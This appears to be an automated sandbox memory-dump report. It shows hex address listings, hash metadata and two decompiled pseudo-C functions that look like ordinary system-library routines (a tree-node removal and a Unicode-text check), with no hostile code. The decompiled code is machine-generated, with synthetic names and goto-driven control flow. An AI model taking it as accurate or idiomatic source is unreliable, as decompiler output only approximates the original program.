0x0144233e
0x0144233e
0x00000000
0x0144232c
0x01442311
0x01442317
0x0144231a
0x0144231c
0x01442380
0x01442380
0x01442380
0x01442384
0x00000000
0x00000000
0x01442386
0x00000000
0x0144231c
0x0144225c
0x0144225c
0x00000000
0x0144225c
0x0144212a
0x01442134
0x01442138
0x0144213d
0x01485858
0x01485863
0x01485863
0x01485867
0x0148586a
0x00000000
0x00000000
0x0148586c
0x0148586c
0x01485871
0x01485875
0x01485877
0x01485997
0x0148599c
0x014859a1
0x014859a7
0x014859a7
0x00000000
0x014859a7
0x0148587d
0x00000000
0x0148588b
0x0148588b
0x01485890
0x01485892
0x01485894
0x01485899
0x0148589b
0x014858a0
0x014858a0
0x014858aa
0x014858b2
0x014858b6
0x014858be
0x014858c6
0x014858c9
0x0148590d
0x01485917
0x0148591a
0x0148591c
0x01485920
0x01485928
0x0148592a
0x0148592c
0x0148592e
0x0148592e
0x014858cb
0x014858cd
0x014858d8
0x014858e0
0x014858f4
0x014858fe
0x014858fe
0x0148593a
0x0148593e
0x01485940
0x01485942
0x00000000
0x01485944
0x01485944
0x01485949
0x0148594e
0x0148594e
0x01485953
0x0148595b
0x01485976
0x01485976
0x0148597a
0x0148597f
0x00000000
0x00000000
0x00000000
0x00000000
0x01485981
0x01485981
0x01485981
0x01485983
0x01485988
0x0148598d
0x01485991
0x01485991
0x00000000
0x0148595d
0x0148595d
0x01485963
0x01485965
0x00000000
0x00000000
0x00000000
0x00000000
0x01485967
0x01485967
0x0148596b
0x0148596d
0x00000000
0x00000000
0x0148596f
0x01485971
0x01485971
0x01485974
0x00000000
0x00000000
0x00000000
0x01485974
0x00000000
0x01485967
0x0148595b
0x01485942
0x01485863
0x01442143
0x01442143
0x01442149
0x0144214f
0x014422f1
0x014422f6
0x00000000
0x01442173
0x01442173
0x0144217d
0x01442181
0x01442186
0x014859ae
0x014859b2
0x014859b5
0x014859b7
0x014859ba
0x014859cd
0x014859d1
0x014859d5
0x014859d9
0x014859db
0x00000000
0x00000000
0x014859dd
0x014859dd
0x014859e1
0x014859e4
0x014859e7
0x014859ee
0x014859ee
0x014859f3
0x014859f3
0x00000000
0x01442186
0x0144214f
0x01442106
0x01442266
0x014420d8
0x014420da
0x014420e0
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000001.00000002.286568954.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1d92e7f6167ff9d57bd6b3725743afa6b4c6ce822891d11607f0d99b4b55cab
Instruction ID: 0f36e92cec37efc11614a0c9fed09da3de6b40007aa7ce5a877cd8e4532eaf75
Opcode Fuzzy Hash: f1d92e7f6167ff9d57bd6b3725743afa6b4c6ce822891d11607f0d99b4b55cab
Instruction Fuzzy Hash: C8F1E031A083419FE726DB2CD840B6BBBE1BB95314F05852FF9959B3A1D7B4D841CB82

Uniqueness

Uniqueness Score: -1.00%

Function 0142B090, Relevance: .4, Instructions: 405
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E0142B090(signed int _a4, signed int _a8, signed int _a12, signed int _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _t117;
				signed int _t119;
				signed int _t120;
				signed int _t121;
				signed int _t122;
				signed int _t123;
				signed int _t126;
				signed int _t134;
				signed int _t139;
				signed char _t143;
				signed int _t144;
				signed int _t146;
				signed int _t148;
				signed int* _t150;
				signed int _t152;
				signed int _t161;
				signed char _t165;
				signed int _t167;
				signed int _t170;
				signed int _t174;
				signed char _t177;
				signed int _t178;
				signed int _t181;
				signed int _t182;
				signed int _t187;
				signed int _t190;
				signed int _t192;
				signed int _t194;
				signed int _t196;
				signed int _t199;
				signed int _t202;
				signed int _t208;
				signed int _t211;

				_t182 = _a16;
				_t178 = _a8;
				_t161 = _a4;
				 *_t182 = 0;
				 *(_t182 + 4) = 0;
				_t5 = _t161 + 4; // 0x4
				_t117 =  *_t5 & 0x00000001;
				if(_t178 == 0) {
					 *_t161 = _t182;
					 *(_t161 + 4) = _t182;
					if(_t117 != 0) {
						_t117 = _t182 | 0x00000001;
						 *(_t161 + 4) = _t117;
					}
					 *(_t182 + 8) = 0;
					goto L43;
				} else {
					_t208 = _t182 ^ _t178;
					_t192 = _t208;
					if(_t117 == 0) {
						_t192 = _t182;
					}
					_t117 = _a12 & 0x000000ff;
					 *(_t178 + _t117 * 4) = _t192;
					if(( *(_t161 + 4) & 0x00000001) == 0) {
						_t208 = _t178;
					}
					 *(_t182 + 8) = _t208 | 0x00000001;
					if(_a12 == 0) {
						_t14 = _t161 + 4; // 0x4
						_t177 =  *_t14;
						_t117 = _t177 & 0xfffffffe;
						if(_t178 == _t117) {
							_t117 = _a4;
							 *(_t117 + 4) = _t182;
							if((_t177 & 0x00000001) != 0) {
								_t161 = _a4;
								_t117 = _t182 | 0x00000001;
								 *(_t161 + 4) = _t117;
							} else {
								_t161 = _t117;
							}
						} else {
							_t161 = _a4;
						}
					}
					if(( *(_t178 + 8) & 0x00000001) == 0) {
						L42:
						L43:
						return _t117;
					} else {
						_t19 = _t161 + 4; // 0x4
						_t165 =  *_t19 & 0x00000001;
						do {
							_t211 =  *(_t178 + 8) & 0xfffffffc;
							if(_t165 != 0) {
								if(_t211 != 0) {
									_t211 = _t211 ^ _t178;
								}
							}
							_t119 =  *_t211;
							if(_t165 != 0) {
								if(_t119 != 0) {
									_t119 = _t119 ^ _t211;
								}
							}
							_t120 = 0;
							_t121 = _t120 & 0xffffff00 | _t119 != _t178;
							_v8 = _t121;
							_t122 = _t121 ^ 0x00000001;
							_v16 = _t122;
							_t123 =  *(_t211 + _t122 * 4);
							if(_t165 != 0) {
								if(_t123 == 0) {
									goto L20;
								}
								_t123 = _t123 ^ _t211;
								goto L13;
							} else {
								L13:
								if(_t123 == 0 || ( *(_t123 + 8) & 0x00000001) == 0) {
									L20:
									_t194 = _v16;
									if((_a12 & 0x000000ff) != _v8) {
										_t126 =  *(_t182 + 8) & 0xfffffffc;
										_t167 = _t165 & 1;
										_v12 = _t167;
										if(_t167 != 0) {
											if(_t126 != 0) {
												_t126 = _t126 ^ _t182;
											}
										}
										if(_t126 != _t178) {
											L83:
											_t178 = 0x1d;
											asm("int 0x29");
											goto L84;
										} else {
											_t126 =  *(_t178 + _t194 * 4);
											if(_t167 != 0) {
												if(_t126 != 0) {
													_t126 = _t126 ^ _t178;
												}
											}
											if(_t126 != _t182) {
												goto L83;
											} else {
												_t126 =  *(_t211 + _v8 * 4);
												if(_t167 != 0) {
													if(_t126 != 0) {
														_t126 = _t126 ^ _t211;
													}
												}
												if(_t126 != _t178) {
													goto L83;
												} else {
													_t77 = _t178 + 8; // 0x8
													_t150 = _t77;
													_v20 = _t150;
													_t126 =  *_t150 & 0xfffffffc;
													if(_t167 != 0) {
														if(_t126 != 0) {
															_t126 = _t126 ^ _t178;
														}
													}
													if(_t126 != _t211) {
														goto L83;
													} else {
														_t202 = _t211 ^ _t182;
														_t152 = _t202;
														if(_t167 == 0) {
															_t152 = _t182;
														}
														 *(_t211 + _v8 * 4) = _t152;
														_t170 = _v12;
														if(_t170 == 0) {
															_t202 = _t211;
														}
														 *(_t182 + 8) =  *(_t182 + 8) & 0x00000003 | _t202;
														_t126 =  *(_t182 + _v8 * 4);
														if(_t170 != 0) {
															if(_t126 == 0) {
																L58:
																if(_t170 != 0) {
																	if(_t126 != 0) {
																		_t126 = _t126 ^ _t178;
																	}
																}
																 *(_t178 + _v16 * 4) = _t126;
																_t199 = _t178 ^ _t182;
																if(_t170 != 0) {
																	_t178 = _t199;
																}
																 *(_t182 + _v8 * 4) = _t178;
																if(_t170 == 0) {
																	_t199 = _t182;
																}
																 *_v20 =  *_v20 & 0x00000003 | _t199;
																_t178 = _t182;
																_t167 =  *((intOrPtr*)(_a4 + 4));
																goto L21;
															}
															_t126 = _t126 ^ _t182;
														}
														if(_t126 != 0) {
															_t167 =  *(_t126 + 8);
															_t194 = _t167 & 0xfffffffc;
															if(_v12 != 0) {
																L84:
																if(_t194 != 0) {
																	_t194 = _t194 ^ _t126;
																}
															}
															if(_t194 != _t182) {
																goto L83;
															}
															if(_v12 != 0) {
																_t196 = _t126 ^ _t178;
															} else {
																_t196 = _t178;
															}
															 *(_t126 + 8) = _t167 & 0x00000003 | _t196;
															_t170 = _v12;
														}
														goto L58;
													}
												}
											}
										}
									}
									L21:
									_t182 = _v8 ^ 0x00000001;
									_t126 =  *(_t178 + 8) & 0xfffffffc;
									_v8 = _t182;
									_t194 = _t167 & 1;
									if(_t194 != 0) {
										if(_t126 != 0) {
											_t126 = _t126 ^ _t178;
										}
									}
									if(_t126 != _t211) {
										goto L83;
									} else {
										_t134 = _t182 ^ 0x00000001;
										_v16 = _t134;
										_t126 =  *(_t211 + _t134 * 4);
										if(_t194 != 0) {
											if(_t126 != 0) {
												_t126 = _t126 ^ _t211;
											}
										}
										if(_t126 != _t178) {
											goto L83;
										} else {
											_t167 = _t211 + 8;
											_t182 =  *_t167 & 0xfffffffc;
											_v20 = _t167;
											if(_t194 != 0) {
												if(_t182 == 0) {
													L80:
													_t126 = _a4;
													if( *_t126 != _t211) {
														goto L83;
													}
													 *_t126 = _t178;
													L34:
													if(_t194 != 0) {
														if(_t182 != 0) {
															_t182 = _t182 ^ _t178;
														}
													}
													 *(_t178 + 8) =  *(_t178 + 8) & 0x00000003 | _t182;
													_t139 =  *((intOrPtr*)(_t178 + _v8 * 4));
													if(_t194 != 0) {
														if(_t139 == 0) {
															goto L37;
														}
														_t126 = _t139 ^ _t178;
														goto L36;
													} else {
														L36:
														if(_t126 != 0) {
															_t167 =  *(_t126 + 8);
															_t182 = _t167 & 0xfffffffc;
															if(_t194 != 0) {
																if(_t182 != 0) {
																	_t182 = _t182 ^ _t126;
																}
															}
															if(_t182 != _t178) {
																goto L83;
															} else {
																if(_t194 != 0) {
																	_t190 = _t126 ^ _t211;
																} else {
																	_t190 = _t211;
																}
																 *(_t126 + 8) = _t167 & 0x00000003 | _t190;
																_t167 = _v20;
																goto L37;
															}
														}
														L37:
														if(_t194 != 0) {
															if(_t139 != 0) {
																_t139 = _t139 ^ _t211;
															}
														}
														 *(_t211 + _v16 * 4) = _t139;
														_t187 = _t211 ^ _t178;
														if(_t194 != 0) {
															_t211 = _t187;
														}
														 *(_t178 + _v8 * 4) = _t211;
														if(_t194 == 0) {
															_t187 = _t178;
														}
														_t143 =  *_t167 & 0x00000003 | _t187;
														 *_t167 = _t143;
														_t117 = _t143 | 0x00000001;
														 *_t167 = _t117;
														 *(_t178 + 8) =  *(_t178 + 8) & 0x000000fe;
														goto L42;
													}
												}
												_t182 = _t182 ^ _t211;
											}
											if(_t182 == 0) {
												goto L80;
											}
											_t144 =  *(_t182 + 4);
											if(_t194 != 0) {
												if(_t144 != 0) {
													_t144 = _t144 ^ _t182;
												}
											}
											if(_t144 == _t211) {
												if(_t194 != 0) {
													_t146 = _t182 ^ _t178;
												} else {
													_t146 = _t178;
												}
												 *(_t182 + 4) = _t146;
												goto L34;
											} else {
												_t126 =  *_t182;
												if(_t194 != 0) {
													if(_t126 != 0) {
														_t126 = _t126 ^ _t182;
													}
												}
												if(_t126 != _t211) {
													goto L83;
												} else {
													if(_t194 != 0) {
														_t148 = _t182 ^ _t178;
													} else {
														_t148 = _t178;
													}
													 *_t182 = _t148;
													goto L34;
												}
											}
										}
									}
								} else {
									 *(_t178 + 8) =  *(_t178 + 8) & 0x000000fe;
									_t182 = _t211;
									 *(_t123 + 8) =  *(_t123 + 8) & 0x000000fe;
									_t174 = _a4;
									_t117 =  *(_t211 + 8);
									_t181 = _t117 & 0xfffffffc;
									if(( *(_t174 + 4) & 0x00000001) != 0) {
										if(_t181 == 0) {
											goto L42;
										}
										_t178 = _t181 ^ _t211;
									}
									if(_t178 == 0) {
										goto L42;
									}
									goto L17;
								}
							}
							L17:
							 *(_t211 + 8) = _t117 | 0x00000001;
							_t40 = _t174 + 4; // 0x4
							_t117 =  *_t178;
							_t165 =  *_t40 & 0x00000001;
							if(_t165 != 0) {
								if(_t117 != 0) {
									_t117 = _t117 ^ _t178;
								}
							}
							_a12 = _t211 != _t117;
						} while (( *(_t178 + 8) & 0x00000001) != 0);
						goto L42;
					}
				}
			}

0x0142b095
0x0142b09b
0x0142b09f
0x0142b0a5
0x0142b0a7
0x0142b0aa
0x0142b0ad
0x0142b0b1
0x0142b3f8
0x0142b3fa
0x0142b3ff
0x0142b419
0x0142b41b
0x0142b41b
0x0142b401
0x00000000
0x0142b0b7
0x0142b0b9
0x0142b0bc
0x0142b0c0
0x0142b0c2
0x0142b0c2
0x0142b0c4
0x0142b0c8
0x0142b0cf
0x0142b0d1
0x0142b0d1
0x0142b0da
0x0142b0dd
0x0142b0df
0x0142b0df
0x0142b0e4
0x0142b0e9
0x0142b3e2
0x0142b3e5
0x0142b3eb
0x0147a676
0x0147a67b
0x0147a67d
0x0142b3f1
0x0142b3f1
0x0142b3f1
0x0142b0ef
0x0142b0ef
0x0142b0ef
0x0142b0e9
0x0142b0f6
0x0142b28d
0x0142b28e
0x0142b293
0x0142b0fc
0x0142b0fc
0x0142b101
0x0142b104
0x0142b107
0x0142b10c
0x0147a687
0x0147a68d
0x0147a68d
0x0147a687
0x0142b112
0x0142b116
0x0147a696
0x0147a69c
0x0147a69c
0x0147a696
0x0142b120
0x0142b121
0x0142b124
0x0142b127
0x0142b12a
0x0142b12d
0x0142b132
0x0147a6a5
0x00000000
0x00000000
0x0147a6ab
0x00000000
0x0142b138
0x0142b138
0x0142b13a
0x0142b193
0x0142b197
0x0142b19d
0x0142b29c
0x0142b29f
0x0142b2a2
0x0142b2a7
0x0147a6d2
0x0147a6d8
0x0147a6d8
0x0147a6d2
0x0142b2af
0x0142b420
0x0142b422
0x0142b423
0x00000000
0x0142b2b5
0x0142b2b5
0x0142b2ba
0x0147a6e1
0x0147a6e7
0x0147a6e7
0x0147a6e1
0x0142b2c2
0x00000000
0x0142b2c8
0x0142b2cb
0x0142b2d0
0x0147a6f0
0x0147a6f6
0x0147a6f6
0x0147a6f0
0x0142b2d8
0x00000000
0x0142b2de
0x0142b2de
0x0142b2de
0x0142b2e1
0x0142b2e6
0x0142b2eb
0x0147a6ff
0x0147a705
0x0147a705
0x0147a6ff
0x0142b2f3
0x00000000
0x0142b2f9
0x0142b2fb
0x0142b2fd
0x0142b301
0x0142b303
0x0142b303
0x0142b308
0x0142b30b
0x0142b310
0x0142b312
0x0142b312
0x0142b31c
0x0142b322
0x0142b327
0x0147a70e
0x0142b335
0x0142b337
0x0147a71d
0x0147a723
0x0147a723
0x0147a71d
0x0142b340
0x0142b345
0x0142b349
0x0147a72a
0x0147a72a
0x0142b352
0x0142b357
0x0142b359
0x0142b359
0x0142b365
0x0142b367
0x0142b36c
0x00000000
0x0142b36c
0x0147a714
0x0147a714
0x0142b32f
0x0142b3b8
0x0142b3bd
0x0142b3c4
0x0142b425
0x0142b427
0x0142b429
0x0142b429
0x0142b427
0x0142b3c8
0x00000000
0x00000000
0x0142b3ce
0x0142b42f
0x0142b3d0
0x0142b3d0
0x0142b3d0
0x0142b3d7
0x0142b3da
0x0142b3da
0x00000000
0x0142b32f
0x0142b2f3
0x0142b2d8
0x0142b2c2
0x0142b2af
0x0142b1a3
0x0142b1a9
0x0142b1af
0x0142b1b2
0x0142b1b5
0x0142b1b8
0x0147a733
0x0147a739
0x0147a739
0x0147a733
0x0142b1c0
0x00000000
0x0142b1c6
0x0142b1c8
0x0142b1cb
0x0142b1ce
0x0142b1d3
0x0147a742
0x0147a748
0x0147a748
0x0147a742
0x0142b1db
0x00000000
0x0142b1e1
0x0142b1e1
0x0142b1e6
0x0142b1e9
0x0142b1ee
0x0147a751
0x0142b409
0x0142b409
0x0142b40e
0x00000000
0x00000000
0x0142b410
0x0142b22d
0x0142b22f
0x0147a790
0x0147a796
0x0147a796
0x0147a790
0x0142b23d
0x0142b243
0x0142b248
0x0147a79f
0x00000000
0x00000000
0x0147a7a5
0x00000000
0x0142b24e
0x0142b24e
0x0142b250
0x0142b374
0x0142b379
0x0142b37e
0x0147a7ae
0x0147a7b4
0x0147a7b4
0x0147a7ae
0x0142b386
0x00000000
0x0142b38c
0x0142b38e
0x0147a7bd
0x0142b394
0x0142b394
0x0142b394
0x0142b39b
0x0142b39e
0x00000000
0x0142b39e
0x0142b386
0x0142b256
0x0142b258
0x0147a7c6
0x0147a7cc
0x0147a7cc
0x0147a7c6
0x0142b261
0x0142b266
0x0142b26a
0x0147a7d3
0x0147a7d3
0x0142b273
0x0142b278
0x0142b27a
0x0142b27a
0x0142b281
0x0142b283
0x0142b285
0x0142b287
0x0142b289
0x00000000
0x0142b289
0x0142b248
0x0147a757
0x0147a757
0x0142b1f6
0x00000000
0x00000000
0x0142b1fc
0x0142b201
0x0147a760
0x0147a766
0x0147a766
0x0147a760
0x0142b209
0x0142b3a8
0x0147a76f
0x0142b3ae
0x0142b3ae
0x0142b3ae
0x0142b3b0
0x00000000
0x0142b20f
0x0142b20f
0x0142b213
0x0147a778
0x0147a77e
0x0147a77e
0x0147a778
0x0142b21b
0x00000000
0x0142b221
0x0142b223
0x0147a787
0x0142b229
0x0142b229
0x0142b229
0x0142b22b
0x00000000
0x0142b22b
0x0142b21b
0x0142b209
0x0142b1db
0x0142b142
0x0142b142
0x0142b146
0x0142b148
0x0142b14c
0x0142b14f
0x0142b154
0x0142b15b
0x0147a6b4
0x00000000
0x00000000
0x0147a6ba
0x0147a6ba
0x0142b163
0x00000000
0x00000000
0x00000000
0x0142b163
0x0142b13a
0x0142b169
0x0142b16b
0x0142b16e
0x0142b171
0x0142b175
0x0142b178
0x0147a6c3
0x0147a6c9
0x0147a6c9
0x0147a6c3
0x0142b180
0x0142b184
0x00000000
0x0142b104
0x0142b0f6

Memory Dump Source

Source File: 00000001.00000002.286568954.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ec6c5e2d367d18b84ee964be1aa1d3b822183ad02e3793e91df51d62079f2cb
Instruction ID: 2da3ed172bd7a50aec4d0264ce4d2b325554b1054aeacc7065c3a918ba7c8eb7
Opcode Fuzzy Hash: 0ec6c5e2d367d18b84ee964be1aa1d3b822183ad02e3793e91df51d62079f2cb
Instruction Fuzzy Hash: 00D1E1717107268BDB26CE2CC4C037BBBA1EF85254B6C856BDC95CB366E731D8828760

Uniqueness

Uniqueness Score: -1.00%

Function 01410D20, Relevance: .4, Instructions: 372
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E01410D20(signed short* _a4, signed char _a8, unsigned int _a12) {
				signed char _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				unsigned int _v36;
				signed char _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				signed int _v96;
				unsigned int _v100;
				signed int _t159;
				unsigned int _t160;
				signed int _t162;
				unsigned int _t163;
				signed int _t180;
				signed int _t192;
				signed int _t193;
				unsigned int _t194;
				signed char _t196;
				signed int _t197;
				signed char _t198;
				signed char _t199;
				unsigned int _t200;
				unsigned int _t202;
				unsigned int _t204;
				unsigned int _t205;
				unsigned int _t209;
				signed int _t210;
				signed int _t211;
				unsigned int _t212;
				signed char _t213;
				signed short* _t214;
				intOrPtr _t215;
				signed int _t216;
				signed int _t217;
				unsigned int _t218;
				signed int _t220;
				signed int _t221;
				signed short _t223;
				signed char _t224;
				signed int _t229;
				signed int _t231;
				unsigned int _t233;
				unsigned int _t237;
				signed int _t238;
				unsigned int _t239;
				signed int _t240;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				signed int _t257;
				unsigned int _t258;
				void* _t261;

				_t213 = _a8;
				_t159 = 0;
				_v60 = 0;
				_t237 = _t213 >> 1;
				_t210 = 0;
				_t257 = 0;
				_v56 = 0;
				_v52 = 0;
				_v44 = 0;
				_v48 = 0;
				_v92 = 0;
				_v88 = 0;
				_v76 = 0;
				_v72 = 0;
				_v64 = 0;
				_v68 = 0;
				_v24 = 0;
				_v80 = 0;
				_v84 = 0;
				_v28 = 0;
				_v32 = 0;
				_v20 = 0;
				_v12 = 0;
				_v16 = 0;
				_v100 = _t237;
				if(_t237 > 0x100) {
					_t254 = 0x100;
					_v36 = 0x100;
					L2:
					_t261 = _t213 - 2;
					if(_t261 == 0) {
						_t214 = _a4;
						_t160 =  *_t214 & 0x0000ffff;
						__eflags = _t160;
						if(_t160 == 0) {
							L108:
							_t159 = 0;
							L8:
							_t238 = 0;
							_v96 = 0;
							if(_t254 == 0) {
								L30:
								_v24 = _t159 - 1;
								goto L31;
							} else {
								goto L11;
								L13:
								_t224 = _t223 >> 8;
								_v40 = _t224;
								_t256 = _t224 & 0x000000ff;
								_t196 = _a4[_t238];
								_v5 = _t196;
								_t197 = _t196 & 0x000000ff;
								if(_t197 == 0xd) {
									__eflags = _t257 - 0xa;
									if(_t257 == 0xa) {
										_v12 = _v12 + 1;
									}
								} else {
									if(_t197 == 0xa) {
										__eflags = _t257 - 0xd;
										if(_t257 == 0xd) {
											_v12 = _v12 + 1;
										}
									}
								}
								_v24 = (0 | _t256 == 0x00000000) + _v24 + (0 | _t197 == 0x00000000);
								if(_t256 > _t257) {
									_t229 = _t256;
								} else {
									_t229 = _t257;
								}
								if(_t257 >= _t256) {
									_t257 = _t256;
								}
								_v28 = _v28 + _t229 - _t257;
								_t231 = _t197;
								if(_t197 <= _t210) {
									_t231 = _t210;
								}
								if(_t210 >= _t197) {
									_t210 = _t197;
								}
								_v32 = _v32 + _t231 - _t210;
								_t238 = _v96 + 1;
								_t210 = _t197;
								_t257 = _t256;
								_v96 = _t238;
								if(_t238 < _v36) {
									_t214 = _a4;
									L11:
									_t223 = _t214[_t238] & 0x0000ffff;
									_t193 = _t223 & 0x0000ffff;
									if(_t193 >= 0x900 || _t193 < 0x21) {
										goto L58;
									} else {
										goto L13;
									}
								}
								_t198 = _v5;
								if(_t198 == 0xd) {
									_t199 = _v40;
									__eflags = _t199 - 0xa;
									if(_t199 != 0xa) {
										L27:
										_t233 = _v12;
										L28:
										if(_t199 != 0) {
											__eflags = _t199 - 0x1a;
											if(_t199 == 0x1a) {
												_v12 = _t233 + 1;
											}
											L31:
											_t162 = _a8;
											if(_t162 > 0x200) {
												_t255 = 0x200;
											} else {
												_t255 = _t162;
											}
											_t215 =  *0x1506d59; // 0x0
											if(_t215 != 0) {
												_t239 = 0;
												__eflags = _t255;
												if(_t255 == 0) {
													goto L34;
												} else {
													goto L119;
												}
												do {
													L119:
													_t192 =  *(_a4 + _t239) & 0x000000ff;
													__eflags =  *((short*)(0x1506920 + _t192 * 2));
													_t163 = _v20;
													if( *((short*)(0x1506920 + _t192 * 2)) != 0) {
														_t163 = _t163 + 1;
														_t239 = _t239 + 1;
														__eflags = _t239;
														_v20 = _t163;
													}
													_t239 = _t239 + 1;
													__eflags = _t239 - _t255;
												} while (_t239 < _t255);
												goto L35;
											} else {
												L34:
												_t163 = 0;
												L35:
												_t240 = _v32;
												_t211 = _v28;
												if(_t240 < 0x7f) {
													__eflags = _t211;
													if(_t211 != 0) {
														L37:
														if(_t240 == 0) {
															_v16 = 0x10;
														}
														L38:
														_t258 = _a12;
														if(_t215 != 0) {
															__eflags = _t163;
															if(_t163 == 0) {
																goto L39;
															}
															__eflags = _t258;
															if(_t258 == 0) {
																goto L39;
															}
															__eflags =  *_t258 & 0x00000400;
															if(( *_t258 & 0x00000400) == 0) {
																goto L39;
															}
															_t218 = _v100;
															__eflags = _t218 - 0x100;
															if(_t218 > 0x100) {
																_t218 = 0x100;
															}
															_t220 = (_t218 >> 1) - 1;
															__eflags = _v20 - 0xaaaaaaab * _t220 >> 0x20 >> 1;
															if(_v20 >= 0xaaaaaaab * _t220 >> 0x20 >> 1) {
																_t221 = _t220 + _t220;
																__eflags = _v20 - 0xaaaaaaab * _t221 >> 0x20 >> 1;
																asm("sbb ecx, ecx");
																_t216 =  ~_t221 + 1;
																__eflags = _t216;
															} else {
																_t216 = 3;
															}
															_v16 = _v16 | 0x00000400;
															_t240 = _v32;
															L40:
															if(_t211 * _t216 < _t240) {
																_v16 = _v16 | 0x00000002;
															}
															_t217 = _v16;
															if(_t240 * _t216 < _t211) {
																_t217 = _t217 | 0x00000020;
															}
															if(_v44 + _v48 + _v52 + _v56 + _v60 != 0) {
																_t217 = _t217 | 0x00000004;
															}
															if(_v64 + _v68 + _v72 + _v76 != 0) {
																_t217 = _t217 | 0x00000040;
															}
															if(_v80 + _v84 + _v88 + _v92 == 0) {
																_t212 = _v12;
																__eflags = _t212;
																if(_t212 == 0) {
																	goto L48;
																}
																__eflags = _t212 - 0xcccccccd * _t255 >> 0x20 >> 5;
																if(_t212 >= 0xcccccccd * _t255 >> 0x20 >> 5) {
																	goto L47;
																}
																goto L48;
															} else {
																L47:
																_t217 = _t217 | 0x00000100;
																L48:
																if((_a8 & 0x00000001) != 0) {
																	_t217 = _t217 | 0x00000200;
																}
																if(_v24 != 0) {
																	_t217 = _t217 | 0x00001000;
																}
																_t180 =  *_a4 & 0x0000ffff;
																if(_t180 != 0xfeff) {
																	__eflags = _t180 - 0xfffe;
																	if(_t180 == 0xfffe) {
																		_t217 = _t217 | 0x00000080;
																	}
																} else {
																	_t217 = _t217 | 0x00000008;
																}
																if(_t258 != 0) {
																	 *_t258 =  *_t258 & _t217;
																	_t217 =  *_t258;
																}
																if((_t217 & 0x00000b08) != 8) {
																	__eflags = _t217 & 0x000000f0;
																	if((_t217 & 0x000000f0) != 0) {
																		L84:
																		return 0;
																	}
																	__eflags = _t217 & 0x00000f00;
																	if((_t217 & 0x00000f00) == 0) {
																		__eflags = _t217 & 0x0000f00f;
																		if((_t217 & 0x0000f00f) == 0) {
																			goto L84;
																		}
																		goto L56;
																	}
																	goto L84;
																} else {
																	L56:
																	return 1;
																}
															}
														}
														L39:
														_t216 = 3;
														goto L40;
													}
													_v16 = 1;
													goto L38;
												}
												if(_t211 == 0) {
													goto L38;
												}
												goto L37;
											}
										} else {
											_t159 = _v24;
											goto L30;
										}
									}
									L104:
									_t233 = _v12 + 1;
									_v12 = _t233;
									goto L28;
								}
								_t199 = _v40;
								if(_t198 != 0xa || _t199 != 0xd) {
									goto L27;
								} else {
									goto L104;
								}
								L58:
								__eflags = _t193 - 0x3001;
								if(_t193 < 0x3001) {
									L60:
									__eflags = _t193 - 0xd00;
									if(__eflags > 0) {
										__eflags = _t193 - 0x3000;
										if(__eflags > 0) {
											_t194 = _t193 - 0xfeff;
											__eflags = _t194;
											if(_t194 != 0) {
												_t200 = _t194 - 0xff;
												__eflags = _t200;
												if(_t200 == 0) {
													_v88 = _v88 + 1;
												} else {
													__eflags = _t200 == 1;
													if(_t200 == 1) {
														_v92 = _v92 + 1;
													}
												}
											}
										} else {
											if(__eflags == 0) {
												_v48 = _v48 + 1;
											} else {
												_t202 = _t193 - 0x2000;
												__eflags = _t202;
												if(_t202 == 0) {
													_v68 = _v68 + 1;
												}
											}
										}
										goto L13;
									}
									if(__eflags == 0) {
										_v76 = _v76 + 1;
										goto L13;
									}
									__eflags = _t193 - 0x20;
									if(__eflags > 0) {
										_t204 = _t193 - 0x900;
										__eflags = _t204;
										if(_t204 == 0) {
											_v64 = _v64 + 1;
										} else {
											_t205 = _t204 - 0x100;
											__eflags = _t205;
											if(_t205 == 0) {
												_v72 = _v72 + 1;
											} else {
												__eflags = _t205 == 0xd;
												if(_t205 == 0xd) {
													_v84 = _v84 + 1;
												}
											}
										}
										goto L13;
									}
									if(__eflags == 0) {
										_v44 = _v44 + 1;
										goto L13;
									}
									__eflags = _t193 - 0xd;
									if(_t193 > 0xd) {
										goto L13;
									}
									_t84 = _t193 + 0x1411174; // 0x4040400
									switch( *((intOrPtr*)(( *_t84 & 0x000000ff) * 4 +  &M01411160))) {
										case 0:
											_v80 = _v80 + 1;
											goto L13;
										case 1:
											_v52 = _v52 + 1;
											goto L13;
										case 2:
											_v56 = _v56 + 1;
											goto L13;
										case 3:
											_v60 = _v60 + 1;
											goto L13;
										case 4:
											goto L13;
									}
								}
								__eflags = _t193 - 0xfeff;
								if(_t193 < 0xfeff) {
									goto L13;
								}
								goto L60;
							}
						}
						__eflags = _t160 >> 8;
						if(_t160 >> 8 == 0) {
							L101:
							_t209 = _a12;
							__eflags = _t209;
							if(_t209 != 0) {
								 *_t209 = 5;
							}
							goto L84;
						}
						goto L108;
					}
					if(_t261 <= 0 || _t237 > 0x100) {
						_t214 = _a4;
					} else {
						_t214 = _a4;
						if((_t213 & 0x00000001) == 0 && ( *(_t214 + _t254 * 2 - 2) & 0x0000ff00) == 0) {
							_t254 = _t254 - 1;
							_v36 = _t254;
						}
					}
					goto L8;
				}
				_t254 = _t237;
				_v36 = _t254;
				if(_t254 == 0) {
					goto L101;
				}
				goto L2;
			}

0x01410d2b
0x01410d2e
0x01410d32
0x01410d39
0x01410d3b
0x01410d3d
0x01410d3f
0x01410d46
0x01410d4d
0x01410d54
0x01410d5b
0x01410d62
0x01410d69
0x01410d70
0x01410d77
0x01410d7e
0x01410d85
0x01410d88
0x01410d8b
0x01410d8e
0x01410d91
0x01410d94
0x01410d97
0x01410d9a
0x01410d9d
0x01410da6
0x014110e9
0x014110ee
0x01410db9
0x01410db9
0x01410dbc
0x0146e9c7
0x0146e9ca
0x0146e9cd
0x0146e9d0
0x0146e9dd
0x0146e9dd
0x01410dec
